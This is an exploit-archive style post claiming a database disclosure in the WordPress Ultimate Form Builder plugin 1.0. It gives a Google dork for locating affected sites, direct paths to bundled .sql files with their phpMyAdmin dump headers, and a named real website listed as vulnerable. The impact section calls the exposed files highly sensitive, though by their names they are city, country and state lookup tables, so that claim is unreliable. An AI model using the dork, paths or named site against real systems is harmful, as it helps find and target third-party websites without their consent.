############################################################################################
# Exploit Title : WordPress Ultimate Form Builder Plugins 1.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/03/2019
# Vendor Homepage : access-keys.com
# Software Information Link :
codecanyon.net/item/ultimate-form-builder/14644208
accesspressthemes.com/wordpress-plugins/ultimate-form-builder/
access-keys.com/documentation/ultimate-form-builder-lite/
# Software Version : WordPress Version 4.x and 5.x - Plugin Version 1.0
# Software Price : Paid Download - 32$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : filetype:sql inurl:/wp-content/plugins/ultimate-form-builder/
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about phpMyAdmin SQL dump File =>
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
############################################################################################
# Description about Software :
***************************
Ultimate Form Builder is a PREMIUM WordPress Plugin which allows you to create unlimited responsive forms
(single step or multi-steps). Anytype of forms (Contact us, Opt-in, Call-to-Action, Survey, Quotation, Enquiry or anything)
can be built using drag and drop form builder. Using this plugin is super easy and fun because – you can create, customize
and build beautiful forms, apply existing form templates for design and use them right onto your WP site in no time.
You can receive form submission data via email and store them in the database which can be exported
to CSV for your use via plugin’s backend.
############################################################################################
# Impact :
***********
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
to have access to that information.
* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.
* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web.
It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both. This file contains an phpMyAdmin SQL dump.
This information is highly sensitive and should not be found on a production system.
Remediation : Restrict access to this file or remove it from the system.
############################################################################################
# Database Disclosure Exploit :
****************************
/wp-content/plugins/ultimate-form-builder/tables/cities.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
/wp-content/plugins/ultimate-form-builder/tables/countries.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
/wp-content/plugins/ultimate-form-builder/tables/db_country_state_city.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
/wp-content/plugins/ultimate-form-builder/tables/states.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
############################################################################################
# Example Vulnerable Sites :
*************************
[+] ema-ic.it/wp-content/plugins/ultimate-form-builder/tables/states.sql
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################